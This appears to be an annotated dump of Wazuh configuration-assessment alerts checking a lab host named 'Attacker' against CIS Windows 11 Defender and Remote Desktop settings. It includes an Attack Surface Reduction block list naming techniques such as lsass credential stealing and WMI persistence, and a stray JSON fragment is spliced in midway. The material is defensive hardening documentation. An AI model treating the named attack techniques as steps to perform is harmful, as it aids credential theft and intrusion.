data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26319 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Join Microsoft MAPS' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to join Microsoft Active Protection Service (MAPS), which Microsoft renamed to Windows Defender Antivirus Cloud Protection Service and then Microsoft Defender Antivirus Cloud Protection Service. Microsoft MAPS / Microsoft Defender Antivirus Cloud Protection Service is the online community that helps you choose how to respond to potential threats. The community also helps stop the spread of new malicious software infections. You can choose to send basic or additional information about detected software. Additional information helps Microsoft create new definitions and help it to protect your computer. Possible options are: - (0x0) Disabled (default) - (0x1) Basic membership - (0x2) Advanced membership Basic membership will send basic information to Microsoft about software that has been detected including where the software came from the actions that you apply or that are applied automatically and whether the actions were successful. Advanced membership in addition to basic information will send more information to Microsoft about malicious software spyware and potentially unwanted software including the location of the software file names how the software operates and how it has impacted your computer. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The information that would be sent can include things like location of detected items on your computer if harmful software was removed. The information would be automatically collected and sent. In some instances personal information might unintentionally be sent to Microsoft. However, Microsoft states that it will not use this information to identify you or contact you. For privacy reasons in high security environments, it is best to prevent these data submissions altogether. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\MAPS\Join Microsoft MAPS. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.4.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 30 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.4'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.5.1.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2618728 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26321 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting sets the Attack Surface Reduction rules. The recommended state for this setting is: 26190899-1602-49e8-8b27-eb1d0a1ce869 - 1 (Block Office communication application from creating child processes) 3b576869-a4ec-4529-8536-b80a7769e899 - 1 (Block Office applications from creating executable content) 5beb7efe-fd9a-4556-801d-275e5ffc04cc - 1 (Block execution of potentially obfuscated scripts) 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 - 1 (Block Office applications from injecting code into other processes) 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c - 1 (Block Adobe Reader from creating child processes) 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b - 1 (Block Win32 API calls from Office macro) 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 - 1 (Block credential stealing from the Windows local security authority subsystem (lsass.exe)) b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 - 1 (Block untrusted and unsigned processes that run from USB) be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 - 1 (Block executable content from email client and webmail) d3e037e1-3eb8-44c8-a917-57927947596d - 1 (Block JavaScript or VBScript from launching downloaded executable content) d4f940ab-401b-4efc-aadc-ad5f3c50688a - 1 (Block Office applications from creating child processes) e6db77e5-3df2-4cf1-b95a-636979351e5b - 1 (Block persistence through WMI event subscription) Note: More information on ASR rules can be found at the following link: Use Attack surface reduction rules to prevent malware infection | Microsoft Docs Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Attack surface reduction helps prevent actions and apps that are typically used by exploit-seeking malware to infect machines. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path so that 26190899-1602-49e8-8b27-eb1d0a1ce869, 3b576869-a4ec-4529-8536-b80a7769e899, 5beb7efe-fd9a-4556-801d-275e5ffc04cc, 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84, 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c, 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b, 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2, b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4, be9ba2d9-53ea-4cdc-84e5-9b1eeee46550, d3e037e1-3eb8-44c8-a917-57927947596d, d4f940ab-401b-4efc-aadc-ad5f3c50688a, and e6db77e5-3df2-4cf1-b95a-636979351e5b are each set to a value of 1: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Microsoft Defender Exploit Guard\Attack Surface Reduction\Configure Attack Surface Reduction rules: Set the state for each ASR rule. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 10 Release 1709 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.5.1.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 10.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: CM.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\ASR\\Rules'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off real-time protection' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.9.2'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2629197 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26325 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off real-time protection' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting configures real-time protection prompts for known malware detection. Microsoft Defender Antivirus alerts you when malware or potentially unwanted software attempts to install itself or to run on your computer. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: When running an antivirus solution such as Microsoft Defender Antivirus, it is important to ensure that it is configured to heuristically monitor in real-time for suspicious and known malicious activity. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Real-Time Protection\Turn off real-time protection. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.9.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-TimeProtection'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on behavior monitoring' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.9.3'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.7'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2632663 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26326 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn on behavior monitoring' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to configure behavior monitoring for Microsoft Defender Antivirus. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: When running an antivirus solution such as Microsoft Defender Antivirus, it is important to ensure that it is configured to heuristically monitor in real-time for suspicious and known malicious activity. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Real-Time Protection\Turn on behavior monitoring. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.9.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 10.7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-TimeProtection'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on script scanning' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.9.4'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.7'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2635900 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26327 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn on script scanning' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows script scanning to be turned on/off. Script scanning intercepts scripts then scans them before they are executed on the system. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: When running an antivirus solution such as Microsoft Defender Antivirus, it is important to ensure that it is configured to heuristically monitor in real-time for suspicious and known malicious activity. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Real-Time Protection\Turn on script scanning. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.9.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 10.7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-TimeProtection'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Watson events' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 31 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.5'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.11.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2639213 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26328 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Configure Watson events' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to configure whether or not Watson events are sent. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Watson events are the reports that get sent to Microsoft when a program or service crashes or fails, including the possibility of automatic submission. Preventing this information from being sent can help reduce privacy concerns. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Reporting\Configure Watson events. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.11.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Reporting'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Scan removable drives' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 32 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.3'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.12.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.4'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gpg_13: ['4.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr_IV: ['35.7.d'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2642421 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26329 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Scan removable drives' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to manage whether or not to scan for malicious software and unwanted software in the contents of removable drives, such as USB flash drives, when running a full scan. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: It is important to ensure that any present removable drives are always included in any type of scan, as removable drives are more likely to contain malicious software brought in to the enterprise managed environment from an external, unmanaged computer. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Scan\Scan removable drives. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.12.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 10.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: CM.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gpg_13: 4.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gdpr_IV: 35.7.d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.b No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Scan'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
$ if local drives are shared they are left vulnerable to intruders who want to exploit the data that is stored on them. the recommended state for this setting is: enabled.", "data.sca.check.rationale": "data could be forwarded from the user's remote desktop services session to the user's local computer without any direct user interaction. malicious software already present on a compromised server would have direct and stealthy disk access to the user's local computer during the remote desktop session.", "data.sca.check.remediation": "to establish the recommended configuration via gp, set the following ui path to enabled: computer configuration\\policies\\administrative templates\\windows components\\remote desktop services\\remote desktop session host\\device and resource redirection\\do not allow drive redirection. note: this group policy path is provided by the group policy template terminalserver.admx/adml that is included with all versions of the microsoft windows administrative templates.", "data.sca.check.compliance.cis": "18.9.65.3.3.3", "data.sca.check.compliance.pci_dss": "4.1", "data.sca.check.compliance.hipaa": "164.312.a.2.iv,164.312.e.1,164.312.e.2.i,164.312.e.2.ii", "data.sca.check.compliance.nist_800_53": "sc.8", "data.sca.check.compliance.tsc": "cc6.1,cc6.7,cc7.2", "data.sca.check.registry": ["hkey_local_machine\\software\\policies\\microsoft\\windows nt\\terminal services"], "data.sca.check.result": "failed", "location": "sca", "_severity_score": 7, "_severity_label": "medium", "_severity_reason": "behaviour\u2011based score \u2265\u00a06"}'>
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not allow drive redirection' is set to 'Enabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not allow drive redirection' is set to 'Enabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not allow drive redirection' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 33 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2646145 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26340 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Do not allow drive redirection' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting prevents users from sharing the local drives on their client computers to Remote Desktop Servers that they access. Mapped drives appear in the session folder tree in Windows Explorer in the following format: \\TSClient\$ If local drives are shared they are left vulnerable to intruders who want to exploit the data that is stored on them. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Data could be forwarded from the user's Remote Desktop Services session to the user's local computer without any direct user interaction. Malicious software already present on a compromised server would have direct and stealthy disk access to the user's local computer during the Remote Desktop session. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Remote Desktop Services\Remote Desktop Session Host\Device and Resource Redirection\Do not allow drive redirection. Note: This Group Policy path is provided by the Group Policy template TerminalServer.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.65.3.3.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 4.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: SC.8 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
